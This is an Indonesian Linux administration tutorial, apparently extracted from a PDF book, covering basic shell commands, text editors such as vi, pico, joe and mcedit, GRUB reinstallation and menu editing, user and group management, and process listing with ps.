Perintah cp digunakan untuk meng-copy suatu file pada suatu direktori tertentu, penggunakan perintahnya adalah seperti berikut: hhan@hhan:~$ cp hhan.txt hhan_copy.txt
Arti dari perintah diatas adalah copy file dengan nama “hhan.txt” ke direktori yang saat itu sedang aktif dengan nama “hhan_copy.txt”. •
Perintah “ls”
Digunakan untuk melihat isi dari sebuah direktori secara lengkap dengan atribut–atributanya. Penggunakan perintahnya adalah seperti berikut ini:
hhan@hhan:~$ ls –alt drwxr-xr-x 4 root 21:27 home
root
4096
Apr 23
Arti dari hasil perintah diatas adalah sebagai berikut : - drwxr-xr-x = mode file d : directory
33
Copyright © 2007 hhan.wordpress.com
-
r : read w: write x : execute - : tidak mempunyai hak 4 = jumlah link (jumlah file didalamnya) root = owner atau group. root yang pertama menunjukan owner dan root yang kedua menunjukan groupnya. 4096 = ukuran file Apr 23 21:27 = tanggal dan waktu modifikasi Home = nama file
•
Perintah “rpm”
-
rpm (Redhat Package Manager), digunakan untuk maintenance paket – paket yang telah ataupun ingin kita instal. Perintah ini merupakan perintah standart untuk linux red hat, untuk distro linux yang lain belum tentu perintah ini ada. Penggunakan perintah rpm adalah seperti berikut: root@hhan:~# rpm –e kdepim-devel-3.1.4-1
Perintah diatas akan meng-uninstall paket dengan nama “kdepim-devel-3.1.4-1”. Untuk meng-install paket dengan nama kdepimdevel-3.1.4-1.tgz perintahnya adalah seperti berikut ini: root@hhan:~# rpm –ivh kdepim-devel-3.1.4-1.tgz
•
Perintah “smbmount”
Perintah smbmount digunakan untuk memounting file sharing, penggunakan perintahnya adalah seperti berikut ini:
34
Copyright © 2007 hhan.wordpress.com
root@hhan:~# smbmount //hhan/sharingku /mnt/net
Perintah di atas akan memounting file “sharingku” pada komputer hhan, dan menaruhnya pada direktori /mnt/net pada komputer lokal. •
Perintah “smbclient”
Untuk melihat file apa saja yang di share oleh suatu host pada jaringan, dapat menggunakan perintah smbclient, penggunakanya seperti berikut : root@hhan:~# smbclient -L 192.168.0.11 Password: Domain=[kakashi] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager] Sharename Type Comment -----------------E$ Disk Default share IPC$ IPC Remote IPC D$ Disk Default share print$ Disk Printer Drivers I$ Disk Default share G$ Disk Default share F$ Disk Default share Softwares Disk ADMIN$ Disk Remote Admin H$ Disk Default share C$ Disk Default share Anime Disk session request to 192.168.0.11 failed (Called name not present) session request to 192 failed (Called name not present) Domain=[ kakashi] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
35
Copyright © 2007 hhan.wordpress.com Dengan perintah seperti diatas akan didapatkan list dari file yang di share oleh host dengan IP 192.168.0.11 seperti diatas. Dari hasil diatas terlihat bahwa host dengan IP 192.168.0.11 memiliki domain dengan nama kakashi, OS windows, dan server windows 2000 LAN Manager, dengan 12 file yang disharing dimana dari kedua belas file yang disharing tersebut 10 diantaranya merupkan file sharing yang di hidden dan merupakan file sharing default dari windows. •
Perintah “mv”
Perintah mv digunakan untuk memindahkan file dari satu lokasi ke lokasi yang lain. Bila argumen yang kedua berupa sebuah direktori maka mv akan memindahkan file ke direktori tersebut. Bila kedua argumen berupa file maka nama file pertama akan menimpa file kedua. •
Perintah “locate” dan “updatedb”
Fungsi dari perintah locate sama dengan fungsi dari perintah find, tetapi locate membutuhkan waktu yang lebih cepat dari pada perintah find dalam mencari sebuah file, karena perintah locate akan hanya akan mencari pada index. Penggunakan dari perintah locate adalah seperti berikut. root@hhan# locate
Pada saat terjadi perubahan struktur directory pada linux anda, sebelum menggunakan perintah locate
36
Copyright © 2007 hhan.wordpress.com kita harus terlebih dahulu memperbarui file indexnya dengan perintah updatedb seperti berikut. root@hhan# updatedb
•
Perintah “alias”
Dengan menggunakan perintah alias, perintah – perintah yang panjang ataupun kurang familiar di telinga kita, kita dapat menggantikanya sesuai keinginan kita. Misalnya perintah “ls –alt” (tanpa tanda kutip), dapat kita ubah menjadi “daftar” dan sebagainya. Perintahnya dapat ditulis seperti berikut ini. root@hhan:~# alias daftar=’ls –alt’
BAB 4 MENGGUNAKAN TEXT EDITOR 37
Copyright © 2007 hhan.wordpress.com
Text editor merupakan sebuah program yang digunakan untuk memanipulasi text, biasanya text editor digunakan untuk mengolah file – file konfigurasi dan juga menulis code – code dari bahasa pemrograman seperti java, c, c++, perl, dll. Di windows kita sering menggunakan text editor yaitu notepad, pada system operasi linux sendiri terdapat dua macam text editor, yang pertama adalah text editor berbasis konsole seperti misalnya pico, joe, mc, vi, dll, dan yang ke dua text editor berbasis GUI misalnya kate, kwrite, dll. 4.1
Text Editor vi
Text editor vi merupakan text editor berbasis konsole. Untuk menggunakan text editor ini langkahnya adalah seperti berikut : 1. Buka konsole 2. Ketikan root@hhan:~# vi Maka akan muncul tampilan pada konsole anda seperti di bawah ini :
38
Copyright © 2007 hhan.wordpress.com
Gambar 4.0 Tampilan pertama editor vi Tekan F1 untuk memunculkan bantuan. 3. Untuk keluar dari vi tekan Esc kemudian ketikan :q dan tekan enter. •
Menulis sebuah file text
Untuk menulis sebuah file text menggunkan editor vi, ketikan perintah berikut : root@hhan:~# vi file.txt Sebelum anda menuliskan text terlebih dahulu tekanlah i (insert) untuk memulai pengetikan. Kemudian tuliskan text anda, setelah text selesai anda tuliskan, untuk keluar dan menyimpanya tekan Esc kemudian tuliskan :wq dan tekan enter. Sedangkan bila anda ingin keluar tetapi tanpa melakukan penyimpanan tekan Esc kemudian ketik :q! .
39
Copyright © 2007 hhan.wordpress.com 4.2
Text Editor Pico
Pico juga merupakan text editor berbasiskan konsole, Tetapi pico lebih powerfull dari pada text editor vi. Navigasi – navigasi seperti untuk mengedit, menyimpan file, dll pada pico selalu didahului dengan Ctrl. Untuk memulai penggunakan pico dapat menuliskan perintah berikut pada konsole. root@hhan:~# pico atau root@hhan:~# nano Setelah perintah di atas dijalankan maka akan konsole akan menampilkan tampilan awal editor pico seperti berikut ini.
Gambar 4.1 Tampilan awal editor pico
40
Copyright © 2007 hhan.wordpress.com Pico mempunyai shortcut-shortcut navigasi sebagai berikut : Ctrl+G digunakan untuk menampilkan bantuan. Ctrl+X digunakan untuk keluar dari editor. Ctrl+C digunakan untuk menampilkan posisi dari cursor kita. Hasil dari Ctrl+C kurang lebih terlihat seperti berikut ini. [ line 1/1 (100%), col 1/1 (100%), char 0/0 (0%) ] Ctrl+R digunakan untuk membuka file. Setelah menekan Ctrl+R anda akan diminta menuliskan nama file yang ingin dibuka, misalnya “namafile.txt”. File to insert [from ./] : namafile.txt Ctrl+W digunakan untuk mencari letak suatu string tertentu. Setelah anda menekan Ctrl+W maka akan dimintai string yang ingin dicari letaknya, misalkan ingin dicari string “auditor”. Search: auditor Setelah string “auditor” ditemukan maka secara otomatis cursor akan mengarah pada string tersebut. Ctrl+K digunakan untuk cut satu baris kalimat pada posisi cursor berada. Ctrl+U digunakan untuk undo (membatalkan) kalimat/string yang sudah kita cut. Ctrl+O digunakan untuk menyimpan hasil modifikasi.
41
Copyright © 2007 hhan.wordpress.com •
Menulis Dengan Pico
Setelah pico dijalankan anda dapat langsung menulisinya dengan text yang ingin anda tuliskan, misalnya, Saya sedang mempelajari linux auditor security”. Kemudian tekan Ctrl+O dan akan ditanya nama file yang ingin digunakan untuk menyimpanya. File Name to Write: file_pico Untuk keluar dari editor pico tekan Ctrl+X. 4.3
Text Editor Joe
Hampir sama dengan text editor pico, text editor joe juga merupakan text editor berbasis konsole dan menu – menu navigasinya juga didahului dengan Ctrl. Berikut ini menu – menu nafigasi pada text editor joe :
Menu cursor: ^B left ^P up ^Z previous word
^F ^N ^X
right down next word
Menu pencarian: ^KF find text ^L find next Menu go to: ^U prev. screen ^A beg. of line
^V ^E
next screen end of line
42
Copyright © 2007 hhan.wordpress.com ^KU top of file ^KL to line No.
^KV end of file
Menu ^KB ^KM ^KW ^K/
block: begin move file filter
^KK end ^KC copy ^KY delete
Menu ^D ^W ^J ^^
delete: character >word >line redo
^Y ^O ^_
line word< undo
Menu file: ^KE edit ^KD save
^KR
insert
Menu exit: ^KX save ^KZ shell
^C
abort
^T ^@
options insert
Spell: ^[N word ^[L file
Lain – lain: ^KJ reformat ^R refresh
43
Copyright © 2007 hhan.wordpress.com
•
Menulis Dengan joe
Seperti halnya untuk mulai menuliskan text pada text editor pico, untuk memulai menuliskan text pada text editor joe dapat langsung mengetikanya setelah menjalankan joe dengan perintah seperti di bawah ini: root@hhan:~# joe Setelah perintah tersebut dijalankan maka akan ditampilkan text editor joe seperti di bawah ini.
Gambar 4.2 Tampilan awal text editor joe Kemudian untuk menyimpan text yang telah anda masukan dapat dilakukan dengan menekan ^KX. Name of file to save (^C to abort): joe_file.txt
44
Copyright © 2007 hhan.wordpress.com Untuk membatalkan, anda dapat melakukanya dengan menekan ^C. 4.4
Text Editor mcedit
mcedit merupakan text editor yang juga berbasis konsole, tetapi sedikit berbeda dengan pico dan joe yang kontrol navigasinya didahului dengan Ctrl, kontrol navigasi pada mcedit didahului dengan Alt kemudian diikuti dengan menekan bilangan navigasi yang dimulai dari angka 1 sampai 10. adapun navigasi tersebut adalah sebagai berikut: Alt+1 Alt+2 Alt+3 Alt+4 Alt+5 Alt+6 Alt+7 Alt+8 Alt+9 Alt+10 atau F10 Alt+f
help save mark replace copy move search delete pull down quit memunculkan menu file
45
Copyright © 2007 hhan.wordpress.com
4.5
Gambar 4.3 Tampilan awal text editor mcedit Text Editor kwrite dan kate
Berbeda dengan text editor pico, joe, mcedit dan vi yang merupakan text editor berbasis konsole, text editor kwrite dan kate merupakan text editor berbasis GUI. Penggunakan text editor berbasis GUI pada linux tidak jauh berbeda dengan penggunakan text editor pada windows seperti misalnya notepad. Text editor kwrite dan kate sangat powerfull untuk menuliskan kode – kode bahasa pemrograman seperti c. c++, java, Perl, dll. Untuk menjalankan text editor kwrite dan kate dapat dilakukan dengan klik start menu Æ Applications Æ Editors Æ Kwrite/kate .
46
Copyright © 2007 hhan.wordpress.com
Gambar 4.4 memulai kwrite dan kate Dibawah ini merupakan tampilan awal dari text editor kwrite dan kate.
Gambar 4.5 Tampilan awal kwrite
Gambar 4.6 Tampilan awal kate
47
Copyright © 2007 hhan.wordpress.com
BAB 5 ADMINISTRASI SYSTEM 5.1
Administrasi Grub Sebagai Boot Loader
GRUB (Grand Unified Bootloader) merupakan sebuah multiboot boot loader, sederhananya boot loader adalah sebuah program yang pertama kali dijalankan saat komputer mulai dinyalakan. Boot loader akan responsible terhadap loading dan transfer kontrol ke kernel sistem operasi. 5.1.1 Instalasi Grub
48
Copyright © 2007 hhan.wordpress.com Saat ini di Indonesia sudah merupakan hal yang biasa jika satu buah komputer memiliki lebih dari satu sistem operasi yang berbeda, biasanya sistem operasi yang terinstall adalah linux dan windows. Untuk membuat system operasi linux dan windows berada pada satu komputer, caranya adalah dengan menginstall windows terlebih dahulu baru setelah itu menginstall linux, hal ini dikarenakan windows tidak memeberikan fasilitas seperti grub atau lilo yang memungkinkan lebih dari satu sistem operasi yang berbeda terinstall pada satu mesin, windows hanya memberikan fasilitas yang memungkinkan lebih dari satu sistem operasi terinstall pada satu komputer, tetapi dengan satu syarat bahwa sistem operasi tersebut semuanya adalah windows, baik itu windows 98, windows 2000, ataupun windows xp. Lalu bagaimana jika pada komputer kita telah terinstall windows dan linux, tetapi pada suatu saat system operasi windows-nya mengalami kerusakan dan harus install ulang windows? apakah kita juga harus install ulang system operasi linux-nya? Padahal system operasi linux-nya tidak mengalami kerusakan sama sekali. Dengan menggunkan fasilitas yang ada pada linux auditor security hal di atas tidak akan menjadi malasah buat kita, kita tidak perlu install ulang linux kita, yang kita perlukan hanyalah install ulang grub-nya. Pada sub bab ini kita akan memecahkan masalah tersebut dengan install ulang grub. Adapun caranya adalah seperti berikut: 1. Jalankan linux auditor security secara live cd (lihat sub bab “Memulai Instalasi Melalui CDROM”). 2. Buka console
49
Copyright © 2007 hhan.wordpress.com 3. Mount drive linux auditor security anda, dalam hal ini drive linux penulis berada pada hda3. root@hhan:~# mount /dev/hda3
Penjelasan tentang perintah mount bisa anda lihat kembali pada bab 4. 4. Jalankan perintah berikut ini : root@hhan:~# grub-install --rootdirectory=/mnt/hda3 /boot/grub/ /dev/hda
Perintah grub-install akan menginstall grub pada drive anda. Syntak umum dari grubinstall dalah sebagai berikut : root@hhan:~# grub-install [OPTION] install_device
penjelasan: --root-directory=/mnt/hda3/boot/grub/ option ini memberikan perintah pada grub-install untuk menginstall grub images pada direktori /mnt/hda3/boot/grub/. /dev/hda merupakan install device kita. 5.1.2 Memodifikasi Grub
Menu
yang
Tampil
pada
Menu grub yang tampil secara default adalah terlihat seperti dibawah ini: Debian GNU/Linux, kernel 2.6.11-auditor-10 Default Debian GNU/Linux, kernel 2.6.11-auditor-10
50
Copyright © 2007 hhan.wordpress.com Windows 2K/XP/2003 (hda1) Kadang – kadang kita tidak suka dengan text dari menu default, dan kita ingin mengubahnya. Untuk mengganti text pada menu grub tersebut sesuai dengan yang kita inginkan caranya adalah dengan meng-edit file konfigurasi grub yaitu menu.lst yang terletak pada direktori /boot/grub. Adapun lebih detailnya bisa mengikuti langkah – langkah berikut ini: 1. Buka console 2. login sebagai root hhan@hhan:~$ su Password: root@hhan:~#
3. Pindah ke direktori /boot/grub root@hhan:~# cd /boot/grub
4. Edit file konfigurasi grub yaitu menu.lst root@hhan:~# pico menu.lst
tampil hasil kurang lebih seperti berikut ini: # menu.lst - See: grub(8), info grub, update-grub(8) # grub-install(8), grub-floppy(8), # grub-md5-crypt, /usr/share/doc/grub # and /usr/share/doc/grub-doc/. ## default num # Set the default entry to the entry number NUM. Numbering starts from 0, and
51
Copyright © 2007 hhan.wordpress.com # the entry number 0 is the default if the command is not used. # # You can specify 'saved' instead of a number. In this case, the default entry # is the entry saved with the command 'savedefault'. default 0 ## timeout sec # Set a timeout, in SEC seconds, before automatically booting the default entry # (normally the first entry defined). timeout
5
# Pretty colours color cyan/blue white/blue gfxmenu (hd0,2)/boot/message # # password ['--md5'] passwd # If used in the first section of a menu file, disable all interactive editing # control (menu entry editor and command-line) and entries protected by the # command 'lock' # e.g. password topsecret # password --md5 $1$gLhU0/$aW78kHK1QfV3P2b2znUoe/ # password topsecret # # examples # # title Windows 95/98/NT/2000 # root (hd0,0) # makeactive # chainloader +1
52
Copyright © 2007 hhan.wordpress.com # # title # root # kernel # kernel #
Linux (hd0,1) /vmlinuz root=/dev/hda2 ro /vmlinuz root=/dev/hda2 ro
# # Put static boot stanzas before and/or after AUTOMAGIC KERNEL LIST ### BEGIN AUTOMAGIC KERNELS LIST ## lines between the AUTOMAGIC KERNELS LIST markers will be modified ## by the debian update-grub script except for the default options below ## DO NOT UNCOMMENT THEM, Just edit them to your needs ## ## Start Default Options ## ## default kernel options ## default kernel options for automagic boot options ## If you want special options for specifiv kernels use kopt_x_y_z ## where x.y.z is kernel version. Minor versions can be omitted. ## e.g. kopt=root=/dev/hda1 ro # kopt=root=/dev/hda3 ro ramdisk_size=100000 lang=us apm=power-off nomce noapm vga=791 ## default grub root device ## e.g. groot=(hd0,0) # groot=(hd0,2) ## should update-grub create alternative automagic boot options
53
Copyright © 2007 hhan.wordpress.com ## e.g. alternative=true ## alternative=false # alternative=false ## should update-grub lock alternative automagic boot options ## e.g. lockalternative=true ## lockalternative=false # lockalternative=false ## altoption boot targets option ## multiple altoptions lines are allowed ## e.g. altoptions=(extra menu suffix) extra boot options ## altoptions=(recovery mode) single # altoptions=(recovery mode) single ## controls how many kernels should be put into the menu.lst ## only counts the first occurence of a kernel, not the ## altoption boot targets option ## multiple altoptions lines are allowed ## e.g. altoptions=(extra menu suffix) extra boot options ## altoptions=(recovery mode) single # altoptions=(recovery mode) single ## controls how many kernels should be put into the menu.lst ## only counts the first occurence of a kernel, not the ## alternative kernel options ## e.g. howmany=all ## howmany=7 # howmany=all ## should update-grub create memtest86 boot option ## e.g. memtest86=true
54
Copyright © 2007 hhan.wordpress.com ## memtest86=false # memtest86=true ## ## End Default Options ## title Debian GNU/Linux, kernel 2.6.11-auditor-10 Default root (hd0,2) kernel /boot/vmlinuz root=/dev/hda3 ro ramdisk_size=100000 lang=us apm=power-off nomce noapm vga=791 initrd /boot/initrd.img savedefault boot title Debian GNU/Linux, kernel 2.6.11-auditor-10 root (hd0,2) kernel /boot/vmlinuz-2.6.11-auditor-10 root=/dev/hda3 ro ramdisk_size=100000 lang=us apm=power-off nomce noapm vga=791 initrd /boot/initrd.img-2.6.11-auditor-10 savedefault boot ### END DEBIAN AUTOMAGIC KERNELS LIST title Windows 2K/XP/2003 (hda1) chainloader (hd0,0)+1 Tanda “#” merupakan sebua simbol yang dipakai untuk memberi komentar pada sebuah file konfigurasi. Kalimat dibelakang tanda “#” nantinya tidak akan dieksekusi. default merupakan option yang menentukan menu yang mana yang akan di load secara
55
Copyright © 2007 hhan.wordpress.com default, nilai yang dapat diberikan pada option default dimulai dari 0. misalnya seperti berikut : default 0 timeout merupakan option yang digunakan untuk mengatur berapa lama menu ditampilkan dan user bisa memilih menu yang ada sebelum dilakukan load pada menu default. Nilai default timeout adalah 5 detik, anda bisa mengubahnya sesuka anda, misalnya : timeout
10
title merupakan text yang akan ditampilkan sebagai menu pilihan. Anda dapat mengubahnya sesuai selera anda. Secara default text yang ditampilkan adalah seperti berikut ini : Debian GNU/Linux, kernel 2.6.11-auditor-10 Default Debian GNU/Linux, kernel 2.6.11-auditor-10 Windows 2K/XP/2003 (hda1) Misalkan kita ingin mengubah menu “Windows 2K/XP/2003 (hda1)” menjadi “Microsoft Windows”, maka kita dapat melakukanya dengan mengubah title-nya yang semula : title Windows 2K/XP/2003 (hda1)
Menjadi seperti berikut ini : Title Microsoft Windows
5. Simpan kembali file konfigurasi, caranya adalah: - tekan ctrl+x - y
56
Copyright © 2007 hhan.wordpress.com - enter 6. Restart komputer root@hhan:~# reboot
Kemudian setelah komputer di-restart maka akan didapatkan menu seperti ini: Debian GNU/Linux, kernel 2.6.11-auditor-10 Default Debian GNU/Linux, kernel 2.6.11-auditor-10 Microsoft Windows
5.2
Administrasi User dan Group pada Linux
Linux merupakan sebuah system operasi yang mendukung multiuser. User dengan hak tertinggi disebut dengan root. Nama-nama login pada linux dapat diberikan pada hal-hal berikut ini: • • • •
User Contoh : hhan, hyraxz, chidori, dll. Aplikasi Contoh : mysql, qmail, squid, dll. Device Contoh : lp Service
57
Copyright © 2007 hhan.wordpress.com Contoh : cron,ftp Pemberian nama-nama login tersebut bertujuan untuk memberikan identitas yang spesifik agar tiap user dapat memiliki file, direktori, dan proses sendiri. 5.2.1 Menambah User Saat pembuatan user pada linux auditor security akan dihasilkan 3 buah file untuk menyimpan informasi tentang user baru tersebut. Adapun ketiga file tersebut adalah: 1) /etc/passwd File ini digunakan untuk menyimpan informasi dari user. Informasi pada file /etc/passwd dipisahkan oleh tanda : (titik dua). Contoh dari file /etc/passwd adalah seperti berikut ini: bind:x:106:108::/var/cache/bind:/bin/false messagebus:x:108:1002::/var/run/dbus:/bin/false captive:x:109:65534::/var/lib/captive:/bin/false sslwrap:x:107:1001::/etc/sslwrap:/bin/false distmp3:x:112:112::/nonexistent:/bin/false saned:x:114:114::/home/saned:/bin/false arpwatch:x:110:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh snort:x:111:117:Snort IDS:/var/log/snort:/bin/false thpot:x:113:65534:Security Officer,,,:/usr/share/thpot:/dev/null ftp:x:115:65534::/home/ftp:/bin/false freerad:x:116:118::/etc/freeradius:/bin/false debian-tor:x:119:119::/var/lib/tor:/bin/bash hatake:x:1003:1003:kakashi hatake,,,:/home/hatake:/bin/bash
58
Copyright © 2007 hhan.wordpress.com hyraxz:x:1006:1006:hyraxz,30,08132030085,02225163 ,jl:/home/hyraxz:/bin/bash Adapun begian-bagian tiap ruasnya adalah sebagai berikut: hyraxz:x:1006:1006:hyraxz,30,08132030085,02225163 ,jl:/home/hyraxz:/bin/bash • • • • • •
hyraxz merupakan nama login. X merupakan password shadow. 1006 merupakan user id dan group id. hyraxz,30,08132030085,02225163,jl merupakan informasi tambahan untuk user yang bersangkutan. /home/hyraxz merupakan letak home direktori dari user hyraxz. /bin/bash merupakan default dari jenis shell untuk user hyraxz.
2) /etc/shadow File ini digunakan untuk menyimpan password yang telah dienkripsi. Dibawah ini merupakan contoh potongan dari /etc/shadow:
arpwatch:!:12769:0:99999:7::: snort:!:12769:0:99999:7::: thpot:!:12769:0:99999:7::: ftp:!:12769:0:99999:7:::
59
Copyright © 2007 hhan.wordpress.com freerad:!:12838:0:99999:7::: debian-tor:!:12934:0:99999:7::: hatake:$1$RGLZqkT5$AItaLcPlYUhCncLGttSzS0 :13187:0:99999:7::: chidori:$1$ChuZKFZP$R0NW.hGAjZ8zyjC1bBnyG 1:13187:0:99999:7::: hyraxz:$1$AUsVY/t2$6mCQNdqDaj1lpZcMB31LZ1 :13189:0:99999:7:::
Pada file /etc/shadow terdapat sederetan karakter yang tidak bisa terbaca seperti “$1$AUsVY/t2$6mCQNdqDaj1lpZcMB31LZ 1”, karakter-karakter tersebut merupakan karakter hasil enkripsi dari password user yang bersangkutan. 3) /etc/group File ini digunakan untuk menyimpan nama group dari user tertentu. Cukup mudah untuk memahami bagian-bagian pada /etc/group karena hanya terdiri dari nama group, GID (Group ID), dan user-user yang termasuk kedalam group yang bersangkutan. Berikut ini merupakan contoh porongan dari file /etc/group :
saned:x:114: camera:x:115: arpwatch:x:116: snort:x:117: freerad:x:118:
60
Copyright © 2007 hhan.wordpress.com debian-tor:x:119: hatake:x:1003: jounin:x:1004:hatake,chidori chidori:x:1005: hyraxz:x:1006
jounin:x:1004:hatake,chidori Pada bagian ini terlihat bahwa user dengan nama login hatake dan chidori masuk kedalam group jounin yang memiliki GID (Group ID) 1004. Untuk membuat sebuah user baru caranya cukup mudah. Perintah yang digunakan adalah adduser, setelah perintah adduser dijalankan maka prosesnya akan terlihat seperti berikut ini: root@hhan:~# adduser hatake Adding user `hatake'... Adding new group `hatake' (1003). Adding new user `hatake' (1003) with group `hatake'. Creating home directory `/home/hatake'. Copying files from `/etc/skel' Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Changing the user information for hatake Enter the new value, or press ENTER for the default Full Name []: kakashi hatake Room Number []: Work Phone []: Home Phone []:
61
Copyright © 2007 hhan.wordpress.com Other []: Is the information correct? [y/N] y
5.2.2 Mengganti Password User Password merupakan informasi yang sangat sensitive, oleh karena itu mengubah password secara periodic dalam interval waktu tertentu merupakan hal yang sangat penting bagi seorang administrator. Dengan melakukan pengubahan password secara berkala maka kemungkinan suatu system untuk disusupi oleh pihak-pihak yang tidak seharusnya akan menjadi berkurang. Untuk melakukan pengubahan password dapat menggunakan perintah passwd. Pengubahan password dengan menggunakan perintah passwd dapat dilakukan melalui dua user, user yang pertama adalah dirinya sendiri, yaitu user yang ingin passwordnya diubah. Dalam hal ini berarti user yang bersangkutan mengubah password miliknya sendiri. Sedangkan yang kedua adalah melalui root. root dengan posisinya yang tertinggi dapat mengubah password miliknya sendiri ataupun password milik user lainya. Adapun penggunkan perintah passwd adalah seperti berikut ini: Melalui root : root@hhan:~# passwd hatake Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully
Atau, melualui user yang bersangkutan :
62
Copyright © 2007 hhan.wordpress.com
hatake@hhan:~$ passwd Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully
Jika ingin mengubah password sebuah user melalui root maka dibelakang perintah passwd harus disertai nama user yang ingin diubah passwordnya, kecuali jika root tersebut ingin mengubah passwordnya sendiri. 5.2.3 Menghapus User Untuk melakukan penghapusan sebuah user perintah yang digunkan adalah userdel. Adapun pemakainya adalah terlihat seperti berikut : root@hhan:~# userdel hatake
Dengan menjalankan perintah diatas maka secara otomatis ketiga file yang berhubungan dengan user tersebut, yaitu /etc/shadow, /etc/passwd, dan /etc/group akan dimodifikasi lagi oleh system. 5.2.4 Menambah Group Dalam linux tiap-tiap user dapat dimasukan kedalam group-group. Fasilitas group ini sangat penting jika sebuah komputer dipakai bersamasama oleh sejumlah user. Dengan menggunakan group maka seorang administrator dapat dengan mudah menentukan hak akses seorang user sesuai dengan kedudukanya. Adapun perintah yang digunakan untuk membuat sebuah group baru
63
Copyright © 2007 hhan.wordpress.com adalah groupadd, seperti berikut ini:
yang
penggunakanya
adalah
root@hhan:~# groupadd jounin
Perintah di atas akan menghasilkan sebuah group baru dengan nama jounin. Dengan menjalankan perintah di atas maka file /etc/group secara otomatis akan dimodifikasi oleh system dengan ditambahkan baris sebagai berikut : jounin:x:1004:
5.2.5 Menghapus Group Untuk menghapus sebuah group dapat menggunakan perintah groupdel. Setelah perintah groupdel anda jalankan maka nama group yang berada pada /etc/group secara otomatis akan dihapus oleh system. Penggunakan perintah groupdel terlihat seperti berikut ini: root@hhan:~# groupdel jounin Perintah di atas akan melakukan penghapusan terhadap group dengan nama jounin. 5.2.6 Menambahkan User ke Group Tertentu Untuk menambahkan user ke dalam group tertentu dapat menggunkan perintah adduser. Syntax penggunkaanya adalah sebagai berikut: root@hhan:~# adduser
64
Copyright © 2007 hhan.wordpress.com Misalkan ingin menambahkan user hatake ke dalam group jounin, maka penggunakan perintah adduser akan menjadi seperti di bawah ini: root@hhan:~# adduser hatake jounin
Sehingga file /etc/group yang mengandung informasi tentang group jounin akan dimodifikasi secara otomatis oleh system menjadi seperti berikut ini: jounin:x:1004:hatake
5.2.7 Menghapus User Dari Group Tertentu Kadang seorang administrator melakukan kesalahan dalam memasukan user ke group tertentu, tentu hal tersebut dapat merupakan kesalahan yang fatal jika user yang seharusnya dimasukan ke dalam group dengan hak akses hanya membaca ternyata masuk ke dalam group yang memiliki akses total terhadap sebuah file, apalagi kalau file tersebut merupakan file yang sangat penting. Untuk menghapus user tersebut dari group yang bersangkutan dapat dilakukan dengan melakukan peng-edit-an pada file /etc/group. Misalkan kita memiliki sebuah user dengan nama Uzumagi yang seharusnya berada pada group genin tetapi sang administrator melakukan kesalahan dengan menempatkanya pada group chunin, sehingga terlihat pada file /etc/group seperti di bawah ini: chunin:x:1004:hatake,chidori,uzumagi
65
Copyright © 2007 hhan.wordpress.com Maka untuk menghapus user uzumagi dari group chunin, hal yang dapat kita lakukan adalah memodifikasi baris diatas menjadi seperti berikut ini : chunin:x:1004:hatake,chidori
Untuk melakukan pengeditan dapat menggunakan text editor yang anda sukai. Penjelesan tentang text editor sendiri telah anda pelajari pada bab 4 yaitu “Menggunakan Text Editor”. 5.3
Administrasi Proses Pada Linux
Sistem linux mencatat sebuah proses dari berbagai program yang dijalankan dalam bentuk sebuah bilangan unik yang disebut PID (Process ID), sehingga dapat diamatipenggunkaan memory tiap proses, user yang menjalankanya, waktu dari process tersebut dan lain-lain. Terdapat dua jenis proses, yaitu foreground process adalah sebuah process yang dijalankan di konsole, shell, xterm, dll dan yang kedua adalah background process yaitu sebuah proses yang dijalankan secara background, proses seperti ini dijalankan dengan menambahkan “&” pada akhir perintah yang ingin dieksekusi, misalnya seperti dibawah ini: root@hhan:~# xmms &
Untuk memonitor proses-proses yang sedang berjalan pada system dapat menggunakan ps dan top.
66
Copyright © 2007 hhan.wordpress.com •
ps
ps yang merupakan kependekan dari “process snapshot” digunakan untuk meng-capture proses yang sedang berjalan. Untuk melihat semua proses pada system penggunkaanya adalah seperti berikut: root@hhan:~# ps aux USER PID %CPU %MEM VSZ RSS STAT START TIME COMMAND root 1 0.0 0.0 156 76 S 11:37 0:01 init [5] root 2 0.0 0.0 0 0 SN 11:37 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 S< 11:37 0:00 [events/0] root 4 0.0 0.0 0 0 S< 11:37 0:00 [khelper] root 9 0.0 0.0 0 0 S< 11:37 0:00 [kthread] root 24 0.0 0.0 0 0 S< 11:37 0:00 [kacpid] hhan 3408 0.1 6.1 27448 15652 S 11:39 0:10 kdeinit: konsole root 3428 0.0 1.3 4748 3548 S 11:39 0:00 bash root 3932 0.0 1.3 4748 3532 S+ 13:40 0:00 bash root 3985 1.1 3.3 49984 8600 Sl 13:49 0:02 xmms root 4360 0.0 0.3 2564 856 R+ 13:52 0:00 ps aux
TTY ? ? ? ? ? ? ? pts/1 pts/2 pts/1 pts/1
Terdapat 10 kolom yang ditampilkan dari perintah diatas, dengan masing-masing kolomnya adalah sebagai berikut: USER tersebut.
:
User
yang
menjalankan
proses
67
Copyright © 2007 hhan.wordpress.com PID : Process ID. %CPU : Besarnya penggunakan CPU sebuah proses. %MEM : Besarnya penggunakan memory sebuah proses (dalam kB). VSZ : besarnya penggunakan virtual memory. RSS : Penggunakan memory yang resident oleh proses. TTY : Terminal (tty), asal dari proses dijalankan. STAT : Keadaan/status suatu proses. o o o o o o o
R : running process S : sleeping process I : idle process Z : Zombie process D : uninteruptable sleep < : high priority process N : low priority process
START : waktu proses mulai dijalankan. TIME : lama proses telah berjalan. COMMAND : perintah yang dijalankan. Untuk melihat proses-proses yang dijalankan oleh satu user tertentu saja dapat menggunakan perintah ps yang dimodifikasi seperti berikut ini : root@hhan:~# ps -U hhan
Dengan perintah seperti di atas maka hanya prosesproses yang dijalankan oleh hhan saja yang akan ditampilkan. •
top
68
